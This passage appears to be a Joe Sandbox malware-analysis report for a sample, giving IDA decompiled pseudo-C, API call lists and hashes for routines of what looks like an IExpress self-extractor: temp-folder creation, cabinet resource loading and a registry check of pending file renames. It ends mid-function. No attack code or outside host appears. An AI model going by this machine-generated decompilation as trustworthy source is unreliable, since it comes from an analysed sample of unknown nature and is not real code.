                                                                        • Associated: 00000001.00000002.394137580.0000000000F88000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8A000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8C000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f80000_brJg.jbxd
                                                                        Similarity
                                                                        • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                                                                        • String ID: *MEMCAB$CABINET
                                                                        • API String ID: 1305606123-2642027498
                                                                        • Opcode ID: 9fd27aa6d8d8b7886dafaa694a9eb78d1e5de37c86c2a8ad19fbd96555bd9e79
                                                                        • Instruction ID: 919f73e338f55c4df8eaa356bf5c72729e50ca02cf3ea1352f7d2d173871e4e0
                                                                        • Opcode Fuzzy Hash: 9fd27aa6d8d8b7886dafaa694a9eb78d1e5de37c86c2a8ad19fbd96555bd9e79
                                                                        • Instruction Fuzzy Hash: 4331B870B44B0A7BE7207B61AD8DFF7365DE744FA5F080015F902A62A1DAB9DC01B761
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        C-Code - Quality: 95%
                                                                        			E00F853A1(CHAR* __ecx, CHAR* __edx) {
                                                                        				signed int _v8;
                                                                        				char _v268;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t5;
                                                                        				long _t13;
                                                                        				int _t14;
                                                                        				CHAR* _t20;
                                                                        				int _t29;
                                                                        				int _t30;
                                                                        				CHAR* _t32;
                                                                        				signed int _t33;
                                                                        				void* _t34;
                                                                        
                                                                        				_t5 =  *0xf88004; // 0x7e92e7a6
                                                                        				_v8 = _t5 ^ _t33;
                                                                        				_t32 = __edx;
                                                                        				_t20 = __ecx;
                                                                        				_t29 = 0;
                                                                        				while(1) {
                                                                        					E00F8171E( &_v268, 0x104, "IXP%03d.TMP", _t29);
                                                                        					_t34 = _t34 + 0x10;
                                                                        					_t29 = _t29 + 1;
                                                                        					E00F81680(_t32, 0x104, _t20);
                                                                        					E00F8658A(_t32, 0x104,  &_v268); // executed
                                                                        					RemoveDirectoryA(_t32); // executed
                                                                        					_t13 = GetFileAttributesA(_t32); // executed
                                                                        					if(_t13 == 0xffffffff) {
                                                                        						break;
                                                                        					}
                                                                        					if(_t29 < 0x190) {
                                                                        						continue;
                                                                        					}
                                                                        					L3:
                                                                        					_t30 = 0;
                                                                        					if(GetTempFileNameA(_t20, "IXP", 0, _t32) != 0) {
                                                                        						_t30 = 1;
                                                                        						DeleteFileA(_t32);
                                                                        						CreateDirectoryA(_t32, 0);
                                                                        					}
                                                                        					L5:
                                                                        					return E00F86CE0(_t30, _t20, _v8 ^ _t33, 0x104, _t30, _t32);
                                                                        				}
                                                                        				_t14 = CreateDirectoryA(_t32, 0); // executed
                                                                        				if(_t14 == 0) {
                                                                        					goto L3;
                                                                        				}
                                                                        				_t30 = 1;
                                                                        				 *0xf88a20 = 1;
                                                                        				goto L5;
                                                                        			}


















                                                                        APIs
                                                                          • Part of subcall function 00F8171E: _vsnprintf.MSVCRT ref: 00F81750
                                                                        • RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,?,00000001,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00F853FB
                                                                        • GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00F85402
                                                                        • GetTempFileNameA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,IXP,00000000,?,?,00000001,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00F8541F
                                                                        • DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00F8542B
                                                                        • CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00F85434
                                                                        • CreateDirectoryA.KERNELBASE(?,00000000,?,00000001,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00F85452
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.394128458.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                        • Associated: 00000001.00000002.394122906.0000000000F80000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394137580.0000000000F88000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8A000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8C000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f80000_brJg.jbxd
                                                                        Similarity
                                                                        • API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
                                                                        • String ID: C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\$IXP$IXP%03d.TMP
                                                                        • API String ID: 1082909758-1231568684
                                                                        • Opcode ID: 529d431f5f3824b96a9ff25301eecc8a653d5158ef20de90f8bf2c7841398568
                                                                        • Instruction ID: 1f9009007443b4ea1778144da670676d0015093c884ae24278484a89029772b5
                                                                        • Opcode Fuzzy Hash: 529d431f5f3824b96a9ff25301eecc8a653d5158ef20de90f8bf2c7841398568
                                                                        • Instruction Fuzzy Hash: 3011E77170050867E720BB369C49FFF766DEFC5721F000126F646D2190DE788947A7A2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 478 f85467-f85484 479 f8548a-f85490 call f853a1 478->479 480 f8551c-f85528 call f81680 478->480 483 f85495-f85497 479->483 484 f8552d-f85539 call f858c8 480->484 485 f8549d-f854c0 call f81781 483->485 486 f85581-f85583 483->486 493 f8553b-f85545 CreateDirectoryA 484->493 494 f8554d-f85552 484->494 495 f8550c-f8551a call f8658a 485->495 496 f854c2-f854d8 GetSystemInfo 485->496 489 f8558d-f8559d call f86ce0 486->489 498 f85577-f8557c call f86285 493->498 499 f85547 493->499 500 f85554-f85557 call f8597d 494->500 501 f85585-f8558b 494->501 495->484 502 f854da-f854dd 496->502 503 f854fe 496->503 498->486 499->494 511 f8555c-f8555e 500->511 501->489 509 f854df-f854e2 502->509 510 f854f7-f854fc 502->510 512 f85503-f85507 call f8658a 503->512 513 f854f0-f854f5 509->513 514 f854e4-f854e7 509->514 510->512 511->501 515 f85560-f85566 511->515 512->495 513->512 514->495 517 f854e9-f854ee 514->517 515->486 518 f85568-f85575 RemoveDirectoryA 515->518 517->512 518->486
                                                                        C-Code - Quality: 75%
                                                                        			E00F85467(CHAR* __ecx, void* __edx, char* _a4) {
                                                                        				signed int _v8;
                                                                        				char _v268;
                                                                        				struct _SYSTEM_INFO _v304;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t10;
                                                                        				void* _t13;
                                                                        				intOrPtr _t14;
                                                                        				void* _t16;
                                                                        				void* _t20;
                                                                        				signed int _t26;
                                                                        				void* _t28;
                                                                        				void* _t29;
                                                                        				CHAR* _t48;
                                                                        				signed int _t49;
                                                                        				intOrPtr _t61;
                                                                        
                                                                        				_t10 =  *0xf88004; // 0x7e92e7a6
                                                                        				_v8 = _t10 ^ _t49;
                                                                        				_push(__ecx);
                                                                        				if(__edx == 0) {
                                                                        					_t48 = 0xf891e4;
                                                                        					_t42 = 0x104;
                                                                        					E00F81680(0xf891e4, 0x104);
                                                                        					L14:
                                                                        					_t13 = E00F858C8(_t48); // executed
                                                                        					if(_t13 != 0) {
                                                                        						L17:
                                                                        						_t42 = _a4;
                                                                        						if(_a4 == 0) {
                                                                        							L23:
                                                                        							 *0xf89124 = 0;
                                                                        							_t14 = 1;
                                                                        							L24:
                                                                        							return E00F86CE0(_t14, 0, _v8 ^ _t49, _t42, 1, _t48);
                                                                        						}
                                                                        						_t16 = E00F8597D(_t48, _t42, 1, 0); // executed
                                                                        						if(_t16 != 0) {
                                                                        							goto L23;
                                                                        						}
                                                                        						_t61 =  *0xf88a20; // 0x0
                                                                        						if(_t61 != 0) {
                                                                        							 *0xf88a20 = 0;
                                                                        							RemoveDirectoryA(_t48);
                                                                        						}
                                                                        						L22:
                                                                        						_t14 = 0;
                                                                        						goto L24;
                                                                        					}
                                                                        					if(CreateDirectoryA(_t48, 0) == 0) {
                                                                        						 *0xf89124 = E00F86285();
                                                                        						goto L22;
                                                                        					}
                                                                        					 *0xf88a20 = 1;
                                                                        					goto L17;
                                                                        				}
                                                                        				_t42 =  &_v268;
                                                                        				_t20 = E00F853A1(__ecx,  &_v268); // executed
                                                                        				if(_t20 == 0) {
                                                                        					goto L22;
                                                                        				}
                                                                        				_push(__ecx);
                                                                        				_t48 = 0xf891e4;
                                                                        				E00F81781(0xf891e4, 0x104, __ecx,  &_v268);
                                                                        				if(( *0xf89a34 & 0x00000020) == 0) {
                                                                        					L12:
                                                                        					_t42 = 0x104;
                                                                        					E00F8658A(_t48, 0x104, 0xf81140);
                                                                        					goto L14;
                                                                        				}
                                                                        				GetSystemInfo( &_v304);
                                                                        				_t26 = _v304.dwOemId & 0x0000ffff;
                                                                        				if(_t26 == 0) {
                                                                        					_push("i386");
                                                                        					L11:
                                                                        					E00F8658A(_t48, 0x104);
                                                                        					goto L12;
                                                                        				}
                                                                        				_t28 = _t26 - 1;
                                                                        				if(_t28 == 0) {
                                                                        					_push("mips");
                                                                        					goto L11;
                                                                        				}
                                                                        				_t29 = _t28 - 1;
                                                                        				if(_t29 == 0) {
                                                                        					_push("alpha");
                                                                        					goto L11;
                                                                        				}
                                                                        				if(_t29 != 1) {
                                                                        					goto L12;
                                                                        				}
                                                                        				_push("ppc");
                                                                        				goto L11;
                                                                        			}

                                                                        APIs
                                                                        • GetSystemInfo.KERNEL32(?,?,?,?,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00F854C9
                                                                        • CreateDirectoryA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,00000000,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00F8553D
                                                                        • RemoveDirectoryA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,00000000,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00F8556F
                                                                          • Part of subcall function 00F853A1: RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,?,00000001,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00F853FB
                                                                          • Part of subcall function 00F853A1: GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00F85402
                                                                          • Part of subcall function 00F853A1: GetTempFileNameA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,IXP,00000000,?,?,00000001,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00F8541F
                                                                          • Part of subcall function 00F853A1: DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00F8542B
                                                                          • Part of subcall function 00F853A1: CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00F85434
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.394128458.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                        • Associated: 00000001.00000002.394122906.0000000000F80000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394137580.0000000000F88000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8A000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8C000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f80000_brJg.jbxd
                                                                        Similarity
                                                                        • API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
                                                                        • String ID: C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\$alpha$i386$mips$ppc
                                                                        • API String ID: 1979080616-4535649
                                                                        • Opcode ID: b1a7f2beff07830a5407aa7bf735c093541617e15bf54abf46a8b67381a72a68
                                                                        • Instruction ID: bc241b1177b749ffbc824f119cf3311f203d3b554e0798736eaf3e8210702c85
                                                                        • Opcode Fuzzy Hash: b1a7f2beff07830a5407aa7bf735c093541617e15bf54abf46a8b67381a72a68
                                                                        • Instruction Fuzzy Hash: F4312971F04A045BCF10BF299C496FF779FAB81F54B0C016AA402CA540DB74CE06B795
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        control_flow_graph 519 f8256d-f8257d 520 f82622-f82627 call f824e0 519->520 521 f82583-f82589 519->521 526 f82629-f8262f 520->526 522 f825e8-f82607 RegOpenKeyExA 521->522 523 f8258b 521->523 528 f82609-f82620 RegQueryInfoKeyA 522->528 529 f825e3-f825e6 522->529 523->526 527 f82591-f82595 523->527 527->526 530 f8259b-f825ba RegOpenKeyExA 527->530 531 f825d1-f825dd RegCloseKey 528->531 529->526 530->529 532 f825bc-f825cb RegQueryValueExA 530->532 531->529 532->531
                                                                        C-Code - Quality: 86%
                                                                        			E00F8256D(signed int __ecx) {
                                                                        				int _v8;
                                                                        				void* _v12;
                                                                        				signed int _t13;
                                                                        				signed int _t19;
                                                                        				long _t24;
                                                                        				void* _t26;
                                                                        				int _t31;
                                                                        				void* _t34;
                                                                        
                                                                        				_push(__ecx);
                                                                        				_push(__ecx);
                                                                        				_t13 = __ecx & 0x0000ffff;
                                                                        				_t31 = 0;
                                                                        				if(_t13 == 0) {
                                                                        					_t31 = E00F824E0(_t26);
                                                                        				} else {
                                                                        					_t34 = _t13 - 1;
                                                                        					if(_t34 == 0) {
                                                                        						_v8 = 0;
                                                                        						if(RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\FileRenameOperations", 0, 0x20019,  &_v12) != 0) {
                                                                        							goto L7;
                                                                        						} else {
                                                                        							_t19 = RegQueryInfoKeyA(_v12, 0, 0, 0, 0, 0, 0,  &_v8, 0, 0, 0, 0);
                                                                        							goto L6;
                                                                        						}
                                                                        						L12:
                                                                        					} else {
                                                                        						if(_t34 > 0 && __ecx <= 3) {
                                                                        							_v8 = 0;
                                                                        							_t24 = RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager", 0, 0x20019,  &_v12); // executed
                                                                        							if(_t24 == 0) {
                                                                        								_t19 = RegQueryValueExA(_v12, "PendingFileRenameOperations", 0, 0, 0,  &_v8); // executed
                                                                        								L6:
                                                                        								asm("sbb eax, eax");
                                                                        								_v8 = _v8 &  !( ~_t19);
                                                                        								RegCloseKey(_v12); // executed
                                                                        							}
                                                                        							L7:
                                                                        							_t31 = _v8;
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				return _t31;
                                                                        				goto L12;
                                                                        			}

                                                                        APIs
                                                                        • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Control\Session Manager,00000000,00020019,?,00000036,00F84096,00F84096,?,00F81ED3,00000001,00000000,?,?,00F84137,?), ref: 00F825B2
                                                                        • RegQueryValueExA.KERNELBASE(?,PendingFileRenameOperations,00000000,00000000,00000000,00F84096,?,00F81ED3,00000001,00000000,?,?,00F84137,?,00F84096), ref: 00F825CB
                                                                        • RegCloseKey.KERNELBASE(?,?,00F81ED3,00000001,00000000,?,?,00F84137,?,00F84096), ref: 00F825DD
                                                                        • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Session Manager\FileRenameOperations,00000000,00020019,?,00000036,00F84096,00F84096,?,00F81ED3,00000001,00000000,?,?,00F84137,?), ref: 00F825FF
                                                                        • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00F84096,00000000,00000000,00000000,00000000,?,00F81ED3,00000001,00000000), ref: 00F8261A
                                                                        Strings
                                                                        • System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 00F825F5
                                                                        • PendingFileRenameOperations, xrefs: 00F825C3
                                                                        • System\CurrentControlSet\Control\Session Manager, xrefs: 00F825A8
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.394128458.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                        • Associated: 00000001.00000002.394122906.0000000000F80000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394137580.0000000000F88000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8A000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8C000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f80000_brJg.jbxd
                                                                        Similarity
                                                                        • API ID: OpenQuery$CloseInfoValue
                                                                        • String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
                                                                        • API String ID: 2209512893-559176071
                                                                        • Opcode ID: ef950f5a6a8935b6af500e9c7c36b9c9cf68b8555cc58c3bb4ed225a6ec60677
                                                                        • Instruction ID: 3f7f22f73cee6fd3cb285c981160f7b67211c09418aa3547983cb833f8032f69
                                                                        • Opcode Fuzzy Hash: ef950f5a6a8935b6af500e9c7c36b9c9cf68b8555cc58c3bb4ed225a6ec60677
                                                                        • Instruction Fuzzy Hash: E3114235D42228FBAF20AB919C09DFB7FBCDF057A1F544056B808A2011DB30AE45F7A1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        control_flow_graph 533 f86a60-f86a91 call f87155 call f87208 GetStartupInfoW 539 f86a93-f86aa2 533->539 540 f86abc-f86abe 539->540 541 f86aa4-f86aa6 539->541 544 f86abf-f86ac5 540->544 542 f86aa8-f86aad 541->542 543 f86aaf-f86aba Sleep 541->543 542->544 543->539 545 f86ad1-f86ad7 544->545 546 f86ac7-f86acf _amsg_exit 544->546 547 f86ad9-f86ae9 call f86c3f 545->547 548 f86b05 545->548 549 f86b0b-f86b11 546->549 553 f86aee-f86af2 547->553 548->549 551 f86b2e-f86b30 549->551 552 f86b13-f86b24 _initterm 549->552 554 f86b3b-f86b42 551->554 555 f86b32-f86b39 551->555 552->551 553->549 556 f86af4-f86b00 553->556 557 f86b44-f86b51 call f87060 554->557 558 f86b67-f86b71 554->558 555->554 560 f86c39-f86c3e call f8724d 556->560 557->558 571 f86b53-f86b65 557->571 559 f86b74-f86b79 558->559 562 f86b7b-f86b7d 559->562 563 f86bc5-f86bc8 559->563 568 f86b7f-f86b81 562->568 569 f86b94-f86b98 562->569 566 f86bca-f86bd3 563->566 567 f86bd6-f86be3 _ismbblead 563->567 566->567 572 f86be9-f86bed 567->572 573 f86be5-f86be6 567->573 568->563 574 f86b83-f86b85 568->574 575 f86b9a-f86b9e 569->575 576 f86ba0-f86ba2 569->576 571->558 572->559 573->572 574->569 577 f86b87-f86b8a 574->577 578 f86ba3-f86bbc call f82bfb 575->578 576->578 577->569 580 f86b8c-f86b92 577->580 583 f86c1e-f86c25 578->583 584 f86bbe-f86bbf exit 578->584 580->574 585 f86c32 583->585 586 f86c27-f86c2d _cexit 583->586 584->563 585->560 586->585
                                                                        C-Code - Quality: 51%
                                                                        			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                        				signed int* _t25;
                                                                        				signed int _t26;
                                                                        				signed int _t29;
                                                                        				int _t30;
                                                                        				signed int _t37;
                                                                        				signed char _t41;
                                                                        				signed int _t53;
                                                                        				signed int _t54;
                                                                        				intOrPtr _t56;
                                                                        				signed int _t58;
                                                                        				signed int _t59;
                                                                        				intOrPtr* _t60;
                                                                        				void* _t62;
                                                                        				void* _t67;
                                                                        				void* _t68;
                                                                        
                                                                        				E00F87155();
                                                                        				_push(0x58);
                                                                        				_push(0xf872b8);
                                                                        				E00F87208(__ebx, __edi, __esi);
                                                                        				 *(_t62 - 0x20) = 0;
                                                                        				GetStartupInfoW(_t62 - 0x68);
                                                                        				 *((intOrPtr*)(_t62 - 4)) = 0;
                                                                        				_t56 =  *((intOrPtr*)( *[fs:0x18] + 4));
                                                                        				_t53 = 0;
                                                                        				while(1) {
                                                                        					asm("lock cmpxchg [edx], ecx");
                                                                        					if(0 == 0) {
                                                                        						break;
                                                                        					}
                                                                        					if(0 != _t56) {
                                                                        						Sleep(0x3e8);
                                                                        						continue;
                                                                        					} else {
                                                                        						_t58 = 1;
                                                                        						_t53 = 1;
                                                                        					}
                                                                        					L7:
                                                                        					_t67 =  *0xf888b0 - _t58; // 0x2
                                                                        					if(_t67 != 0) {
                                                                        						__eflags =  *0xf888b0; // 0x2
                                                                        						if(__eflags != 0) {
                                                                        							 *0xf881e4 = _t58;
                                                                        							goto L13;
                                                                        						} else {
                                                                        							 *0xf888b0 = _t58;
                                                                        							_t37 = E00F86C3F(0xf810b8, 0xf810c4); // executed
                                                                        							__eflags = _t37;
                                                                        							if(__eflags == 0) {
                                                                        								goto L13;
                                                                        							} else {
                                                                        								 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                                        								_t30 = 0xff;
                                                                        							}
                                                                        						}
                                                                        					} else {
                                                                        						_push(0x1f);
                                                                        						L00F86FF4();
                                                                        						L13:
                                                                        						_t68 =  *0xf888b0 - _t58; // 0x2
                                                                        						if(_t68 == 0) {
                                                                        							_push(0xf810b4);
                                                                        							_push(0xf810ac);
                                                                        							L00F87202();
                                                                        							 *0xf888b0 = 2;
                                                                        						}
                                                                        						if(_t53 == 0) {
                                                                        							 *0xf888ac = 0;
                                                                        						}
                                                                        						_t71 =  *0xf888b4;
                                                                        						if( *0xf888b4 != 0 && E00F87060(_t71, 0xf888b4) != 0) {
                                                                        							_t60 =  *0xf888b4; // 0x0
                                                                        							 *0xf8a288(0, 2, 0);
                                                                        							 *_t60();
                                                                        						}
                                                                        						_t25 = __imp___acmdln; // 0x76725b9c
                                                                        						_t59 =  *_t25;
                                                                        						 *(_t62 - 0x1c) = _t59;
                                                                        						_t54 =  *(_t62 - 0x20);
                                                                        						while(1) {
                                                                        							_t41 =  *_t59;
                                                                        							if(_t41 > 0x20) {
                                                                        								goto L32;
                                                                        							}
                                                                        							if(_t41 != 0) {
                                                                        								if(_t54 != 0) {
                                                                        									goto L32;
                                                                        								} else {
                                                                        									while(_t41 != 0 && _t41 <= 0x20) {
                                                                        										_t59 = _t59 + 1;
                                                                        										 *(_t62 - 0x1c) = _t59;
                                                                        										_t41 =  *_t59;
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        							__eflags =  *(_t62 - 0x3c) & 0x00000001;
                                                                        							if(( *(_t62 - 0x3c) & 0x00000001) == 0) {
                                                                        								_t29 = 0xa;
                                                                        							} else {
                                                                        								_t29 =  *(_t62 - 0x38) & 0x0000ffff;
                                                                        							}
                                                                        							_push(_t29);
                                                                        							_t30 = E00F82BFB(0xf80000, 0, _t59); // executed
                                                                        							 *0xf881e0 = _t30;
                                                                        							__eflags =  *0xf881f8;
                                                                        							if( *0xf881f8 == 0) {
                                                                        								exit(_t30); // executed
                                                                        								goto L32;
                                                                        							}
                                                                        							__eflags =  *0xf881e4;
                                                                        							if( *0xf881e4 == 0) {
                                                                        								__imp___cexit();
                                                                        								_t30 =  *0xf881e0; // 0x0
                                                                        							}
                                                                        							 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                                        							goto L40;
                                                                        							L32:
                                                                        							__eflags = _t41 - 0x22;
                                                                        							if(_t41 == 0x22) {
                                                                        								__eflags = _t54;
                                                                        								_t15 = _t54 == 0;
                                                                        								__eflags = _t15;
                                                                        								_t54 = 0 | _t15;
                                                                        								 *(_t62 - 0x20) = _t54;
                                                                        							}
                                                                        							_t26 = _t41 & 0x000000ff;
                                                                        							__imp___ismbblead(_t26);
                                                                        							__eflags = _t26;
                                                                        							if(_t26 != 0) {
                                                                        								_t59 = _t59 + 1;
                                                                        								__eflags = _t59;
                                                                        								 *(_t62 - 0x1c) = _t59;
                                                                        							}
                                                                        							_t59 = _t59 + 1;
                                                                        							 *(_t62 - 0x1c) = _t59;
                                                                        						}
                                                                        					}
                                                                        					L40:
                                                                        					return E00F8724D(_t30);
                                                                        				}
                                                                        				_t58 = 1;
                                                                        				__eflags = 1;
                                                                        				goto L7;
                                                                        			}



















                                                                        APIs
                                                                          • Part of subcall function 00F87155: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00F87182
                                                                          • Part of subcall function 00F87155: GetCurrentProcessId.KERNEL32 ref: 00F87191
                                                                          • Part of subcall function 00F87155: GetCurrentThreadId.KERNEL32 ref: 00F8719A
                                                                          • Part of subcall function 00F87155: GetTickCount.KERNEL32 ref: 00F871A3
                                                                          • Part of subcall function 00F87155: QueryPerformanceCounter.KERNEL32(?), ref: 00F871B8
                                                                        • GetStartupInfoW.KERNEL32(?,00F872B8,00000058), ref: 00F86A7F
                                                                        • Sleep.KERNEL32(000003E8), ref: 00F86AB4
                                                                        • _amsg_exit.MSVCRT ref: 00F86AC9
                                                                        • _initterm.MSVCRT ref: 00F86B1D
                                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 00F86B49
                                                                        • exit.KERNELBASE ref: 00F86BBF
                                                                        • _ismbblead.MSVCRT ref: 00F86BDA
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.394128458.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                        • Associated: 00000001.00000002.394122906.0000000000F80000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394137580.0000000000F88000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8A000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8C000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f80000_brJg.jbxd
                                                                        Similarity
                                                                        • API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
                                                                        • String ID:
                                                                        • API String ID: 836923961-0
                                                                        • Opcode ID: c1a994f87e7c1a1427cc4e48b9cf580d1dec9f56957ef8da1574bbf1186292f1
                                                                        • Instruction ID: 46546831d4c8cef33a28ba882718b2b2008e84eaeb7e2adfc231b729367f3129
                                                                        • Opcode Fuzzy Hash: c1a994f87e7c1a1427cc4e48b9cf580d1dec9f56957ef8da1574bbf1186292f1
                                                                        • Instruction Fuzzy Hash: 6141C0319447288BEB21BB649C497FA77A4FB84775F64012AE841E7290CF788842BB81
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 587 f858c8-f858d5 588 f858d8-f858dd 587->588 588->588 589 f858df-f858f1 LocalAlloc 588->589 590 f85919-f85959 call f81680 call f8658a CreateFileA LocalFree 589->590 591 f858f3-f85901 call f844b9 589->591 594 f85906-f85910 call f86285 590->594 600 f8595b-f8596c CloseHandle GetFileAttributesA 590->600 591->594 601 f85912-f85918 594->601 600->594 602 f8596e-f85970 600->602 602->594 603 f85972-f8597b 602->603 603->601
                                                                        C-Code - Quality: 95%
                                                                        			E00F858C8(intOrPtr* __ecx) {
                                                                        				void* _v8;
                                                                        				intOrPtr _t6;
                                                                        				void* _t10;
                                                                        				void* _t12;
                                                                        				void* _t14;
                                                                        				signed char _t16;
                                                                        				void* _t20;
                                                                        				void* _t23;
                                                                        				intOrPtr* _t27;
                                                                        				CHAR* _t33;
                                                                        
                                                                        				_push(__ecx);
                                                                        				_t33 = __ecx;
                                                                        				_t27 = __ecx;
                                                                        				_t23 = __ecx + 1;
                                                                        				do {
                                                                        					_t6 =  *_t27;
                                                                        					_t27 = _t27 + 1;
                                                                        				} while (_t6 != 0);
                                                                        				_t36 = _t27 - _t23 + 0x14;
                                                                        				_t20 = LocalAlloc(0x40, _t27 - _t23 + 0x14);
                                                                        				if(_t20 != 0) {
                                                                        					E00F81680(_t20, _t36, _t33);
                                                                        					E00F8658A(_t20, _t36, "TMP4351$.TMP");
                                                                        					_t10 = CreateFileA(_t20, 0x40000000, 0, 0, 1, 0x4000080, 0); // executed
                                                                        					_v8 = _t10;
                                                                        					LocalFree(_t20);
                                                                        					_t12 = _v8;
                                                                        					if(_t12 == 0xffffffff) {
                                                                        						goto L4;
                                                                        					} else {
                                                                        						CloseHandle(_t12);
                                                                        						_t16 = GetFileAttributesA(_t33); // executed
                                                                        						if(_t16 == 0xffffffff || (_t16 & 0x00000010) == 0) {
                                                                        							goto L4;
                                                                        						} else {
                                                                        							 *0xf89124 = 0;
